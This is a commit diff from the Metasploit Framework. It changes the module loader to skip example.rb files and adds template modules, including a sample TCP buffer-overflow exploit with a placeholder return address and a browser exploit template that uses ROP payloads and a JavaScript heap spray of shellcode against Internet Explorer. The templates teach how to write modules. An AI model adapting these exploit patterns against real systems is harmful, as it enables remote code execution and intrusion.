Land #8172, example modules

lands several example modules

lib/msf/core/modules/loader/base.rb

@@ -173,7 +173,8 @@ def load_module(parent_path, type, module_reference_name, options={})
       true
     }
 
-    loaded = namespace_module_transaction(type + "/" + module_reference_name, :reload => reload, &try_eval_module)
+    loaded = namespace_module_transaction(type + "/" + module_reference_name,
+      :reload => reload, &try_eval_module)
     unless loaded
       return false
     end

lib/msf/core/modules/loader/directory.rb

@@ -28,12 +28,11 @@ def loadable?(path)
   def each_module_reference_name(path, opts={})
     whitelist = opts[:whitelist] || []
     ::Dir.foreach(path) do |entry|
+
       full_entry_path = ::File.join(path, entry)
       type = entry.singularize
 
-      unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
-        next
-      end
+      next unless ::File.directory?(full_entry_path) && module_manager.type_enabled?(type)
 
       full_entry_pathname = Pathname.new(full_entry_path)
 
@@ -43,6 +42,7 @@ def each_module_reference_name(path, opts={})
           entry_descendant_pathname = Pathname.new(entry_descendant_path)
           relative_entry_descendant_pathname = entry_descendant_pathname.relative_path_from(full_entry_pathname)
           relative_entry_descendant_path = relative_entry_descendant_pathname.to_s
+          next if File::basename(relative_entry_descendant_path) == "example.rb"
 
           # The module_reference_name doesn't have a file extension
           module_reference_name = module_reference_name_from_path(relative_entry_descendant_path)

modules/auxiliary/example.rb

@@ -0,0 +1,44 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This sample auxiliary module simply displays the selected action and
+# registers a custom command that will show up when the module is used.
+#
+###
+class MetasploitModule < Msf::Auxiliary
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'        => 'Sample Auxiliary Module',
+      # The description can be multiple lines, but does not preserve formatting.
+      'Description' => 'Sample Auxiliary Module',
+      'Author'      => ['Joe Module <joem@example.com>'],
+      'License'     => MSF_LICENSE,
+      'Actions'     =>
+        [
+          ['Default Action'],
+          ['Another Action']
+        ]
+    ))
+
+  end
+
+  def run
+    print_status("Running the simple auxiliary module with action #{action.name}")
+  end
+
+  # auxiliary modules can register new commands, they all call cmd_* to
+  # dispatch them
+  def auxiliary_commands
+    return { "aux_extra_command" => "Run this auxiliary test commmand" }
+  end
+
+  def cmd_aux_extra_command(*args)
+    print_status("Running inside aux_extra_command(#{args.join(" ")})")
+  end
+
+end

modules/exploits/example.rb

@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This exploit sample shows how an exploit module could be written to exploit
+# a bug in an arbitrary TCP server.
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  #
+  # This exploit affects TCP servers, so we use the TCP client mixin.
+  # See ./documentation/samples/vulnapps/testsrv/testsrv.c for building the
+  # vulnerable target program.
+  #
+  include Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      # The Name should be just like the line of a Git commit - software name,
+      # vuln type, class. It needs to fit in 50 chars ideally. Preferably apply
+      # some search optimization so people can actually find the module.
+      # We encourage consistency between module name and file name.
+      'Name'           => 'Sample Exploit',
+      'Description'    => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+        in an TCP server that has a parsing bug.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => ['skape'],
+      'References'     =>
+        [
+          [ 'OSVDB', '12345' ],
+          [ 'EDB', '12345' ],
+          [ 'URL', 'http://www.example.com'],
+          [ 'CVE', '1978-1234'],
+        ],
+      'Payload'        =>
+        {
+          'Space'    => 1000,
+          'BadChars' => "\x00",
+        },
+      'Targets'        =>
+        [
+          # Target 0: Windows All
+          [
+            'Windows XP/Vista/7/8',
+            {
+              'Platform' => 'win',
+              'Ret'      => 0x41424344
+            }
+          ],
+        ],
+      'DisclosureDate' => "Apr 1 2013",
+      # Note that this is by index, rather than name. It's generally easiest
+      # just to put the default at the beginning of the list and skip this
+      # entirely.
+      'DefaultTarget'  => 0))
+  end
+
+  #
+  # The sample exploit just indicates that the remote host is always
+  # vulnerable.
+  #
+  def check
+    Exploit::CheckCode::Vulnerable
+  end
+
+  #
+  # The exploit method connects to the remote service and sends 1024 random bytes
+  # followed by the fake return address and then the payload.
+  #
+  def exploit
+    connect
+
+    print_status("Sending #{payload.encoded.length} byte payload...")
+
+    # Build the buffer for transmission
+    buf  = rand_text_alpha(1024)
+    buf << [ target.ret ].pack('V')
+    buf << payload.encoded
+
+    # Send it off
+    sock.put(buf)
+    sock.get_once
+
+    handler
+  end
+
+end
+

modules/exploits/windows/browser/example.rb

@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This exploit sample demonstrates how a typical browser exploit is written using commonly
+# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::RopDb
+  include Msf::Exploit::Remote::BrowserAutopwn
+
+  # Set :classid and :method for ActiveX exploits. For example:
+  # :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
+  # :method     => "SetShapeNodeType",
+  autopwn_info({
+    :ua_name    => HttpClients::IE,
+    :ua_minver  => "8.0",
+    :ua_maxver  => "10.0",
+    :javascript => true,
+    :os_name    => OperatingSystems::Match::WINDOWS,
+    :rank       => NormalRanking
+  })
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Module Name",
+      'Description'    => %q{
+        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
+        the browser version.  Please note IE8 and newer may emulate an older IE version
+        in compatibility mode, in that case the module won't be able to detect the
+        browser correctly.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => [ 'sinn3r' ],
+      'References'     =>
+        [
+          [ 'URL', 'http://metasploit.com' ]
+        ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ],
+          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
+          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
+          [ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
+          [ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
+          [ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
+        ],
+      'Payload'        =>
+        {
+          'BadChars'        => "\x00",  # js_property_spray
+          'StackAdjustment' => -3500
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 1 2013",
+      'DefaultTarget'  => 0))
+  end
+
+  def get_target(agent)
+    return target if target.name != 'Automatic'
+
+    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
+    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
+
+    ie_name = "IE #{ie}"
+
+    case nt
+    when '5.1'
+      os_name = 'Windows XP SP3'
+    when '6.0'
+      os_name = 'Windows Vista'
+    when '6.1'
+      os_name = 'Windows 7'
+    when '6.2'
+      os_name = 'Windows 8'
+    when '6.3'
+      os_name = 'Windows 8.1'
+    end
+
+    targets.each do |t|
+      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
+        return t
+      end
+    end
+
+    nil
+  end
+
+  def get_payload(t)
+    stack_pivot = "\x41\x42\x43\x44"
+    code        = payload.encoded
+
+    case t['Rop']
+    when :msvcrt
+      print_status("Using msvcrt ROP")
+      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
+
+    else
+      print_status("Using JRE ROP")
+      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
+    end
+
+    rop_payload
+  end
+
+
+  def get_html(t)
+    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
+    html = %Q|
+      <script>
+      #{js_property_spray}
+
+      var s = unescape("#{js_p}");
+      sprayHeap({shellcode:s});
+      </script>
+    |
+
+    html.gsub(/^\t\t/, '')
+  end
+
+
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    print_status("Requesting: #{request.uri}")
+
+    target = get_target(agent)
+    if target.nil?
+      print_error("Browser not supported, sending 404: #{agent}")
+      send_not_found(cli)
+      return
+    end
+
+    print_status("Target selected as: #{target.name}")
+    html = get_html(target)
+    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
+  end
+end

modules/exploits/windows/http/dupscts_bof.rb

@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GreatRanking